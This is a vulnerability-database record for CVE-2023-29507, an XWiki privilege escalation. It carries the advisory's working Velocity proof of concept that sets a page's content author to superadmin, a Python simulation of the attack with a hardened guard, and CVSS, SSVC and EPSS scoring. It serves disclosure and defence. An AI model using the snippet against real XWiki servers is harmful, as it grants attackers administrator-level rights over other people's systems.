Vulnerability details: VCID-ka4y-na7f-5kcc
Vulnerability ID VCID-ka4y-na7f-5kcc
Aliases CVE-2023-29507
GHSA-pwfv-3cvg-9m4c
Summary org.xwiki.platform:xwiki-platform-oldcore makes Incorrect Use of Privileged APIs with DocumentAuthors
The Document script API returns the underlying DocumentAuthors object directly, so any script can set arbitrary authors on the document. Because the content author is the identity used for subsequent rights checks, a script running as a low-privilege user can set the content author to a privileged user and then trigger rendering, so that the document's scripts execute with that user's rights. Example of such an attack:
```
{{velocity}}
$doc.setContent('{{velocity}}$xcontext.context.authorReference{{/velocity}}')
$doc.authors.setContentAuthor('xwiki:XWiki.superadmin')
$doc.getRenderedContent()
{{/velocity}}
```
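The following Python model replays the advisory's attack sequence to make the privilege confusion concrete. It is an added illustration, not XWiki's code: the User and Document classes, the right names, and the user reference xwiki:XWiki.lowpriv are hypothetical stand-ins for the real xwiki-platform-oldcore classes and rights model. The SafeDocumentAuthors guard shows one way a script-API wrapper can be hardened (the calling user must already hold the right it would confer); it is not a claim about the exact change made in the fixing commit.

```python
# Model of the privilege confusion behind CVE-2023-29507.
# Added illustration: NOT XWiki's code. User/Document, the right names and
# the xwiki:XWiki.lowpriv reference are simplified, hypothetical stand-ins.

from dataclasses import dataclass

PROGRAMMING = "programming"   # right needed by privileged script APIs
SCRIPT = "script"             # right an ordinary editor has: may write {{velocity}}


@dataclass(frozen=True)
class User:
    reference: str
    rights: frozenset


# Constructed sample users (xwiki:XWiki.lowpriv is hypothetical).
USERS = {
    "xwiki:XWiki.superadmin": User("xwiki:XWiki.superadmin", frozenset({SCRIPT, PROGRAMMING})),
    "xwiki:XWiki.lowpriv": User("xwiki:XWiki.lowpriv", frozenset({SCRIPT})),
}


class DocumentAuthors:
    """Mutable author record. The vulnerable script API handed this object out directly."""

    def __init__(self, content_author: str):
        self.content_author = content_author

    def set_content_author(self, reference: str) -> None:
        self.content_author = reference


class SafeDocumentAuthors:
    """Hardened stand-in: mutators are gated on the *calling* user's rights, so a
    script can never install an author more privileged than its own caller."""

    def __init__(self, inner: DocumentAuthors, caller: User):
        self._inner, self._caller = inner, caller

    @property
    def content_author(self) -> str:
        return self._inner.content_author

    def set_content_author(self, reference: str) -> None:
        if PROGRAMMING not in self._caller.rights:
            raise PermissionError(f"{self._caller.reference} may not change the content author")
        self._inner.set_content_author(reference)


class Document:
    def __init__(self, content_author: str, guard_authors: bool):
        self._authors = DocumentAuthors(content_author)
        self._guard_authors = guard_authors
        self.content = ""

    def set_content(self, content: str) -> None:          # $doc.setContent(...)
        self.content = content

    def get_authors(self, caller: User):                   # $doc.authors
        # Vulnerable build: the raw mutable object. Hardened build: a guarded wrapper.
        if self._guard_authors:
            return SafeDocumentAuthors(self._authors, caller)
        return self._authors

    def render_as(self) -> str:                            # $doc.getRenderedContent()
        # XWiki evaluates a document's scripts with the rights of its content author.
        return self._authors.content_author


def run_attack(guard_authors: bool) -> tuple:
    """Replay the advisory's Velocity sequence as xwiki:XWiki.lowpriv and report
    (author the document renders as, whether that author holds PROGRAMMING)."""
    attacker = USERS["xwiki:XWiki.lowpriv"]
    doc = Document(content_author=attacker.reference, guard_authors=guard_authors)
    doc.set_content("{{velocity}}$xcontext.context.authorReference{{/velocity}}")
    try:
        doc.get_authors(attacker).set_content_author("xwiki:XWiki.superadmin")
    except PermissionError:
        pass                                               # hardened build refuses
    author = doc.render_as()
    return author, PROGRAMMING in USERS[author].rights


if __name__ == "__main__":
    print("vulnerable build renders as:", run_attack(guard_authors=False))
    print("hardened build renders as:  ", run_attack(guard_authors=True))
```

The vulnerable path returns superadmin with programming right granted; the hardened path leaves the document rendering as the low-privilege caller. The design point is that the script API must never expose a mutable privilege-bearing field without checking the caller, because the field's value is what later rights checks trust.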
Status Published
Exploitability 0.5
Weighted Severity 9.0
Risk 4.5
Affected and Fixed Packages Package Details
Weaknesses (3)
System Score Found at
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.03251 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.09937 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
cvssv3.1_qr CRITICAL https://github.com/advisories/GHSA-pwfv-3cvg-9m4c
cvssv3.1 9.1 https://github.com/xwiki/xwiki-platform
generic_textual CRITICAL https://github.com/xwiki/xwiki-platform
cvssv3.1 9.1 https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
generic_textual CRITICAL https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
ssvc Track* https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
cvssv3.1 9.1 https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
cvssv3.1_qr CRITICAL https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
generic_textual CRITICAL https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
ssvc Track* https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
cvssv3.1 9.1 https://jira.xwiki.org/browse/XWIKI-20380
generic_textual CRITICAL https://jira.xwiki.org/browse/XWIKI-20380
ssvc Track* https://jira.xwiki.org/browse/XWIKI-20380
cvssv3.1 9.1 https://nvd.nist.gov/vuln/detail/CVE-2023-29507
generic_textual CRITICAL https://nvd.nist.gov/vuln/detail/CVE-2023-29507
No exploits are available in the tracked exploit sources. Note that the advisory summary above already carries a working proof of concept, which is consistent with the SSVC Exploitation value E:P (proof of concept) in the vectors below.
All five sources below report the same CVSS 3.1 vector, decoded once:

Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector (AV): network
Attack Complexity (AC): low
Privileges Required (PR): high
User Interaction (UI): none
Scope (S): changed
Confidentiality Impact (C): high
Integrity Impact (I): high
Availability Impact (A): high

Found at https://github.com/xwiki/xwiki-platform
Found at https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
Found at https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
Found at https://jira.xwiki.org/browse/XWIKI-20380
Found at https://nvd.nist.gov/vuln/detail/CVE-2023-29507

PR:H matches the proof of concept in the summary, which must be authored by an account that can already run {{velocity}} in a page.

Vector: SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-02-06T16:59:40Z/ Found at https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
Vector: SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-02-06T16:59:40Z/ Found at https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
Vector: SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-02-06T16:59:40Z/ Found at https://jira.xwiki.org/browse/XWIKI-20380
Exploit Prediction Scoring System (EPSS)
Percentile 0.7483
EPSS Score 0.0085
Published At April 2, 2026, 12:55 p.m.
Date Actor Action Source VulnerableCode Version
2026-04-01T12:51:07.795149+00:00 GitLab Importer Import https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.xwiki.platform/xwiki-platform-oldcore/CVE-2023-29507.yml 38.0.0